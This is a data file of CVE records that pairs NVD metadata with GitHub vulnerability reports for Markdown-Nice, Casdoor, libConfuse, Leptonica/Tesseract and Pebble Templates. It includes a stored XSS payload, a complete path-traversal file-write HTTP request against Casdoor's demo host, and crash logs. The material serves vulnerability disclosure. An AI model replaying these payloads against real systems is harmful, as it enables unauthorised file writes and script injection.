https://api.github.com/repos/jflyfox/jfinal_cms/issues/52/comments
0
2022-08-09T10:01:49Z
2022-08-09T10:01:49Z
https://github.com/jflyfox/jfinal_cms/issues/52
1,333,015,169
52
4,119
CVE-2022-38639
2022-09-09T19:15:08.313
A cross-site scripting (XSS) vulnerability in Markdown-Nice v1.8.22 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Community Posting field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mdnice/markdown-nice/issues/327" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mdnice/markdown-nice/issues/327" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:inkdrop:markdown_nice:1.8.22:*:*:*:*:*:*:*", "matchCriteriaId": "88A634C2-783D-495C-AE35-B9675EF1E397", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mdnice/markdown-nice/issues/327
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mdnice", "markdown-nice" ]
The markdown preview executes the xss vector, and the stored xss occurs in the community posting, which can be fixed by the [DOMPurify](https://github.com/cure53/DOMPurify) project. `<img src=1 onerror=alert(1)>` ![image](https://user-images.githubusercontent.com/70327097/185776925-613dfe89-8cff-4f4f-b576-491b3dea701d.png)
markdown preview executes the xss Vulnerability
https://api.github.com/repos/mdnice/markdown-nice/issues/327/comments
0
2022-08-21T05:32:10Z
2022-08-21T05:32:39Z
https://github.com/mdnice/markdown-nice/issues/327
1,345,391,399
327
4,120
CVE-2022-38638
2022-09-09T20:15:11.340
Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/issues/1035" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/issues/1035" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:casbin:casdoor:1.97.3:*:*:*:*:*:*:*", "matchCriteriaId": "DE13C979-CCE6-412B-B288-83F643A798D4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/casdoor/casdoor/issues/1035
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "casdoor", "casdoor" ]
Hi, I found a security issue, when the upload provider is Storage Local File System, the `fullFilePath` parameter of the interface `/api/upload-resource` will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below: ![image](https://user-images.githubusercontent.com/40165502/185615626-7e1ad76b-b8e8-4263-8ab5-0baa231bc79a.png) ```http POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider_storage_local_file_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider_storage_local_file_system HTTP/1.1 Host: door.casdoor.com Cookie: casdoor_session_id=2fd9ab275d8d65ea296ab327fd92166a Content-Length: 192 Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "macOS" Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM Accept: */* Origin: https://door.casdoor.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://door.casdoor.com/resources Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryUPAwhIoXMrbemuJM Content-Disposition: form-data; name="file"; filename="spider.png" Content-Type: image/png I'm here. ------WebKitFormBoundaryUPAwhIoXMrbemuJM-- ``` Then we can find out that the problem does occur by following this link。 https://door.casdoor.com/flag.html ![image](https://user-images.githubusercontent.com/40165502/185616802-dc0b34a1-3223-428f-9416-bd42b3cec370.png)
Arbitrary file write/overwrite Vulnerability
https://api.github.com/repos/casdoor/casdoor/issues/1035/comments
3
2022-08-19T12:19:28Z
2022-09-12T06:22:15Z
https://github.com/casdoor/casdoor/issues/1035
1,344,366,609
1,035
4,121
CVE-2022-40320
2022-09-09T21:15:08.577
cfg_tilde_expand in confuse.c in libConfuse 3.3 has a heap-based buffer over-read.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libconfuse/libconfuse/issues/163" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BSAZK4KAWRWNAFUBBXOYU3PVNH3X7226/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EDUT2V62V2XF2IT5TJFPB6P3EQ6X5VLL/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FJKHAPJ6AUWVP4HDGKH4M5A2XXWQI73O/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libconfuse/libconfuse/issues/163" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BSAZK4KAWRWNAFUBBXOYU3PVNH3X7226/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EDUT2V62V2XF2IT5TJFPB6P3EQ6X5VLL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FJKHAPJ6AUWVP4HDGKH4M5A2XXWQI73O/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libconfuse_project:libconfuse:3.3:*:*:*:*:*:*:*", "matchCriteriaId": "8133F4E0-4B30-4ACC-8123-712738E73B1F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libconfuse/libconfuse/issues/163
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libconfuse", "libconfuse" ]
## short summary Hello, I was testing my fuzzer and found a heap buffer overflow in cfg_tilde_expand, src/confuse.c:1909. A heap buffer overflow can be triggered when parsing a crafted file. As shown in the attachment ## Step to reproduce ``` CC="gcc -fsanitize=address -g " CXX="g++ -fsanitize=address -g" ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ./examples/cfgtest $POC ``` ## Environment * Ubuntu 22.04 (docker image) * gcc 11.2.0 * libconfuse latest commit 0325922cfff66ba32c3c60d8c9ddf606a22e059f ## ASan Log ``` Using libConfuse 3.3 by Martin Hedenfalk <martin@bzero.se> ================================================================= ==418268==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000572 at pc 0x7f94939440ab bp 0x7ffcd3b274a0 sp 0x7ffcd3b26c48 READ of size 3 at 0x602000000572 thread T0 #0 0x7f94939440aa in __interceptor_getpwnam ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1922 #1 0x555a8791cb33 in cfg_tilde_expand /benchmark/libconfuse/src/confuse.c:1909 #2 0x555a8792a97f in cfg_lexer_include /benchmark/libconfuse/src/lexer.l:332 #3 0x555a8791d6e0 in call_function /benchmark/libconfuse/src/confuse.c:1274 #4 0x555a87921a3e in cfg_parse_internal /benchmark/libconfuse/src/confuse.c:1566 #5 0x555a87922523 in cfg_parse_fp /benchmark/libconfuse/src/confuse.c:1701 #6 0x555a87922523 in cfg_parse_fp /benchmark/libconfuse/src/confuse.c:1685 #7 0x555a8792266f in cfg_parse /benchmark/libconfuse/src/confuse.c:1802 #8 0x555a8791750a in main /benchmark/libconfuse/examples/cfgtest.c:129 #9 0x7f94936bad8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #10 0x7f94936bae3f in __libc_start_main_impl ../csu/libc-start.c:392 #11 0x555a87917d04 in _start (/benchmark/libconfuse/examples/cfgtest+0x7d04) 0x602000000572 is located 0 bytes to the right of 2-byte region [0x602000000570,0x602000000572) allocated by thread T0 here: #0 0x7f949396d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 #1 0x555a8791cb0d in cfg_tilde_expand /benchmark/libconfuse/src/confuse.c:1904 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1922 in __interceptor_getpwnam Shadow bytes around the buggy address: 0x0c047fff8050: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8060: fa fa 00 fa fa fa 05 fa fa fa fd fa fa fa fd fa 0x0c047fff8070: fa fa 00 fa fa fa fd fd fa fa 00 fa fa fa 00 fa 0x0c047fff8080: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa 00 fa 0x0c047fff8090: fa fa fd fd fa fa 00 fa fa fa 00 fa fa fa 00 fa =>0x0c047fff80a0: fa fa 00 fa fa fa 03 fa fa fa 00 fa fa fa[02]fa 0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==418268==ABORTING ``` ## Credit Han Zheng (NCNIPC of China, Hexhive) ## POC [poc0.zip](https://github.com/libconfuse/libconfuse/files/9476056/poc0.zip)
[BUG] heap buffer overflow in cfg_tilde_expand
https://api.github.com/repos/libconfuse/libconfuse/issues/163/comments
0
2022-09-02T07:59:23Z
2022-09-02T14:13:47Z
https://github.com/libconfuse/libconfuse/issues/163
1,359,841,405
163
4,122
CVE-2022-38266
2022-09-09T22:15:08.830
An issue in the Leptonica linked library (v1.79.0) allows attackers to cause an arithmetic exception leading to a Denial of Service (DoS) via a crafted JPEG file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DanBloomberg/leptonica/commit/f062b42c0ea8dddebdc6a152fd16152de215d614" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tesseract-ocr/tesseract/issues/3498" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00018.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202312-01" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DanBloomberg/leptonica/commit/f062b42c0ea8dddebdc6a152fd16152de215d614" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tesseract-ocr/tesseract/issues/3498" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00018.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202312-01" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tesseract_project:tesseract:5.0.0:alpha-20210401:*:*:*:*:*:*", "matchCriteriaId": "D83B1B84-78AE-4CFD-B425-509B29AF243B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:leptonica:leptonica:*:*:*:*:*:*:*:*", "matchCriteriaId": "1616069D-AF01-4FED-83F7-80566DF507D7", "versionEndExcluding": "1.80.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/tesseract-ocr/tesseract/issues/3498
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tesseract-ocr", "tesseract" ]
### **System Configuration** - tesseract version: 5.0.0-alpha-20210401 - linked library version: leptonica-1.79.0 libgif 5.1.4 : libjpeg 8d (libjpeg-turbo 2.0.3) : libpng 1.6.37 : libtiff 4.1.0 : zlib 1.2.11 : libwebp 0.6.1 : libopenjp2 2.3.1 Found AVX512BW Found AVX512F Found AVX2 Found AVX Found FMA Found SSE Found OpenMP 201511 Found libcurl/7.68.0 GnuTLS/3.6.13 zlib/1.2.11 brotli/1.0.7 libidn2/2.2.0 libpsl/0.21.0 (+libidn2/2.2.0) libssh/0.9.3/openssl/zlib nghttp2/1.40.0 librtmp/2.3 - Environment (Operating system, version and so on): Ubuntu 20.04.2 64bit ## Program received signal SIGFPE, Arithmetic exception. #0 0x00007ffff7dbe24a in pixBlockconvGray () from /lib/x86_64-linux-gnu/liblept.so.5 #1 0x00007ffff7dbeadd in pixBlockconv () from /lib/x86_64-linux-gnu/liblept.so.5 #2 0x00005555556b2d9b in tesseract::TextlineProjection::ConstructProjection (this=0x55555586e230, input_block=input_block@entry=0x55555587e110, rotation=..., nontext_map=...) at ./src/ccstruct/image.h:34 #3 0x00005555556980a7 in tesseract::StrokeWidth::GradeBlobsIntoPartitions (this=0x55555586ac20, pageseg_mode=pageseg_mode@entry=tesseract::PSM_AUTO, rerotation=..., block=block@entry=0x55555587e110, nontext_pix=..., denorm=<optimized out>, cjk_script=0x0, projection=0x55555586e230, diacritic_blobs=0x7fffffffd018, part_grid=0x55555586e1d8, big_parts=0x55555586e208) at src/textord/strokewidth.cpp:371 #4 0x000055555566b4e5 in tesseract::ColumnFinder::FindBlocks (this=this@entry=0x55555586e0a0, pageseg_mode=pageseg_mode@entry=tesseract::PSM_AUTO, scaled_color=..., scaled_factor=<optimized out>, input_block=input_block@entry=0x55555587e110, photo_mask_pix=..., thresholds_pix=..., grey_pix=..., pixa_debug=0x7ffff624cbd0, blocks=0x7fffffffcf78, diacritic_blobs=0x7fffffffd018, to_blocks=0x7fffffffd020) at src/textord/colfind.cpp:295 #5 0x00005555555b1c8f in tesseract::Tesseract::AutoPageSeg (this=0x7ffff6229010, pageseg_mode=tesseract::PSM_AUTO, blocks=0x555556f3f830, to_blocks=0x7fffffffd020, diacritic_blobs=0x7fffffffd018, osd_tess=<optimized out>, osr=0x7fffffffd3d0) at src/ccmain/pagesegmain.cpp:226 #6 0x00005555555b214d in tesseract::Tesseract::SegmentPage (this=0x7ffff6229010, input_file=<optimized out>, blocks=0x555556f3f830, osd_tess=osd_tess@entry=0x0, osr=osr@entry=0x7fffffffd3d0) at ./src/ccutil/params.h:202 #7 0x0000555555580e17 in tesseract::TessBaseAPI::FindLines (this=0x7fffffffe100) at /usr/include/c++/9/bits/basic_string.h:2300 #8 0x0000555555583608 in tesseract::TessBaseAPI::Recognize (this=0x7fffffffe100, monitor=0x0) at src/api/baseapi.cpp:838 #9 0x0000555555583c0a in tesseract::TessBaseAPI::ProcessPage (this=this@entry=0x7fffffffe100, pix=0x55555587a110, page_index=page_index@entry=0x0, filename=filename@entry=0x7fffffffe77a "/home/ubuntu/Aws-Results/orcheFuzz-newbug/output_tesseract_of/initial_crashes/2021-05-06-03:01:41_0x7b7d0fd6_0xb1c1261c", retry_config=retry_config@entry=0x0, timeout_millisec=timeout_millisec@entry=0x0, renderer=0x55555586e710) at src/api/baseapi.cpp:1259 #10 0x0000555555584888 in tesseract::TessBaseAPI::ProcessPagesInternal (this=0x7fffffffe100, filename=<optimized out>, retry_config=0x0, timeout_millisec=0x0, renderer=0x55555586e710) at /usr/include/c++/9/bits/basic_string.h:2300 #11 0x0000555555584e33 in tesseract::TessBaseAPI::ProcessPages (this=0x7fffffffe100, filename=<optimized out>, retry_config=<optimized out>, timeout_millisec=<optimized out>, renderer=<optimized out>) at src/api/baseapi.cpp:1071 #12 0x0000555555575ba5 in main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffe528) at /usr/include/c++/9/bits/unique_ptr.h:360 #13 0x00007ffff771f0b3 in __libc_start_main (main=0x555555574ee0 <main(int, char**)>, argc=0x3, argv=0x7fffffffe528, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe518) at ../csu/libc-start.c:308 #14 0x000055555557d1be in _start () at /usr/include/x86_64-linux-gnu/bits/stdio2.h:100 I've attached the file. Please download and check the file. [2021-05-06-03_01_41_0x7b7d0fd6_0xb1c1261c.zip](https://github.com/tesseract-ocr/tesseract/files/6821974/2021-05-06-03_01_41_0x7b7d0fd6_0xb1c1261c.zip)
While processing, division by zero causes an arithmetic exception
https://api.github.com/repos/tesseract-ocr/tesseract/issues/3498/comments
13
2021-07-15T09:34:01Z
2022-11-21T16:44:14Z
https://github.com/tesseract-ocr/tesseract/issues/3498
945,189,724
3,498
4,123
CVE-2022-37767
2022-09-12T14:15:09.110
Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok. NOTE: the vendor disputes this because input to the Pebble templating engine is intended to include arbitrary Java code, and thus either the input should not arrive from an untrusted source, or else the application using the engine should apply restrictions to the input. The engine is not responsible for validating the input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Y4tacker/Web-Security/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Y4tacker/Web-Security/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pebbletemplates:pebble_templates:3.1.5:*:*:*:*:*:*:*", "matchCriteriaId": "9A45A63E-6BB7-4C65-9557-4516199DE5C9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PebbleTemplates", "pebble" ]
Hello, since this morning security checks in our projects are reporting new critical vulnerability in the current pebble version 3.1.5: NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-37767 Original report: https://github.com/Y4tacker/Web-Security/issues/3 Any short-term workaround to mitigate the vulnerability?
Vulnerability CVE-2022-37767
https://api.github.com/repos/PebbleTemplates/pebble/issues/625/comments
38
2022-09-15T07:30:44Z
2023-03-23T16:02:53Z
https://github.com/PebbleTemplates/pebble/issues/625
1,374,064,812
625
4,124
CVE-2022-37767
2022-09-12T14:15:09.110
Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok. NOTE: the vendor disputes this because input to the Pebble templating engine is intended to include arbitrary Java code, and thus either the input should not arrive from an untrusted source, or else the application using the engine should apply restrictions to the input. The engine is not responsible for validating the input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Y4tacker/Web-Security/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PebbleTemplates/pebble/issues/625#issuecomment-1282138635" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Y4tacker/Web-Security/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pebbletemplates:pebble_templates:3.1.5:*:*:*:*:*:*:*", "matchCriteriaId": "9A45A63E-6BB7-4C65-9557-4516199DE5C9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/Y4tacker/Web-Security/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Y4tacker", "Web-Security" ]
# Pebble 3.1.5 Bypass Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springboot. First, simply set up an environment with the official documentation:https://pebbletemplates.io/ Pom.xml ```xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.7.2</version> <relativePath/> <!-- lookup parent from repository --> </parent> <groupId>com.example</groupId> <artifactId>hackingpebble</artifactId> <version>0.0.1-SNAPSHOT</version> <name>hackingpebble</name> <description>hackingpebble</description> <properties> <java.version>1.8</java.version> </properties> <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <dependency> <groupId>io.pebbletemplates</groupId> <artifactId>pebble-spring-boot-starter</artifactId> <version>3.1.5</version> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-test</artifactId> <scope>test</scope> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-maven-plugin</artifactId> </plugin> </plugins> </build> </project> ``` com.example.hackingpebble.HackingpebbleApplication.java ```java package com.example.hackingpebble; import com.mitchellbosecke.pebble.PebbleEngine; import com.mitchellbosecke.pebble.loader.Loader; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.context.annotation.Bean; @SpringBootApplication public class HackingpebbleApplication { public static void main(String[] args) { SpringApplication.run(HackingpebbleApplication.class, args); } } ``` com.example.hackingpebble.controller.Test.java ```java package com.example.hackingpebble.controller; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestParam; @Controller public class Test { @RequestMapping({"/"}) public String getTemplate(@RequestParam String template) { return template; } } ``` application.properties ```java pebble.prefix = templates pebble.suffix = .pebble ``` And file structure as follows: <img width="840" alt="2022-08-03 20 57 15" src="https://user-images.githubusercontent.com/56486273/182613443-8dc02374-35f8-428a-94e7-33ecf5b19087.png"> When we control the parameter template we can render back the specified template file. In previous versions, in order to mitigate command execution caused by malicious content in the template,pebble introduces a new security mechanism, which is implemented through the class BlacklistMethodAccessValidator. In this class you can see a lot of restrictions, on the one hand, restricting the class to be an instance of certain classes, and on the other hand, restricting the execution of some methods 